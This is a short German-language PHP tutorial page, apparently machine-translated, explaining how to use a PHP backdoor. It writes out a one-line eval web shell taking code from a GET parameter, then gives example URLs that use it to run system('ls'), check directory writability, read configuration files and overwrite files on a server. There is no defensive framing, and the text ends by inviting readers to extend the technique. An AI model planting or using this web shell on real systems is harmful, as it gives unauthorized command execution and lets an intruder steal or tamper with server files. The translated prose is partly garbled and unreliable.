Heim > Backend-Entwicklung > PHP-Tutorial > Einige Verwendungsmöglichkeiten der PHP-Hintertür

Einige Verwendungsmöglichkeiten der PHP-Hintertür

藏色散人
Freigeben: 2023-04-06 20:20:02
nach vorne
7074 Leute haben es durchsucht

Heute werden wir über einige der häufigsten Einsatzmöglichkeiten von Hintertüren in PHP sprechen

Schreiben Sie zunächst die einfachste Hintertür, die auch als Trojaner bezeichnet werden kann.

<?php eval($_GET[&#39;evl&#39;]);
Nach dem Login kopieren

Das war's, Sie haben viele Ausführungsberechtigungen auf diesem Server erhalten.

Wozu dient diese Szene?

Druckserverphpinfo

http://www.test.com/a.php?evl=phpinfo()
Nach dem Login kopieren

Überprüfen Sie, welche Dateien sich in einem Verzeichnis befinden

http://www.test.com/a.php?evl=var_dump(system("ls /mnt/web/ -a"));
Nach dem Login kopieren

Überprüfen Sie, ob das Verzeichnis beschreibbar ist, und überprüfen Sie dann das beschreibbare Erstellen eine ausführbare Datei im Verzeichnis

http://www.test.com/a.php?evl=var_dump(is_writable("/mnt/web/abc/"));
Nach dem Login kopieren

Den Inhalt einer Datei abrufen, die im Allgemeinen zum Lesen der Konfiguration verwendet wird

http://www.test.com/a.php?evl=var_dump(file_get_contents("/mnt/web/temp/api.php"));
Nach dem Login kopieren

Dateien in ein beschreibbares Verzeichnis schreiben

http://www.test.com/a.php?evl=var_dump(file_put_contents("/mnt/web/temp/api.php",file_get_contents("/mnt/web/script/test.php")));
Nach dem Login kopieren

Okay, das Obige Der Teil hat im Grunde den Teil zerstört, der die Anzeige eines Servers vervollständigen kann. Versuchen wir, Rückschlüsse auf andere Funktionen zu ziehen.

Das obige ist der detaillierte Inhalt vonEinige Verwendungsmöglichkeiten der PHP-Hintertür. Für weitere Informationen folgen Sie bitte anderen verwandten Artikeln auf der PHP chinesischen Website!

Verwandte Etiketten:
Quelle:aliyun.com
Erklärung dieser Website
Der Inhalt dieses Artikels wird freiwillig von Internetnutzern beigesteuert und das Urheberrecht liegt beim ursprünglichen Autor. Diese Website übernimmt keine entsprechende rechtliche Verantwortung. Wenn Sie Inhalte finden, bei denen der Verdacht eines Plagiats oder einer Rechtsverletzung besteht, wenden Sie sich bitte an admin@php.cn
Beliebte Tutorials
Mehr>
Neueste Downloads
Mehr>
Web-Effekte
Quellcode der Website
Website-Materialien
Frontend-Vorlage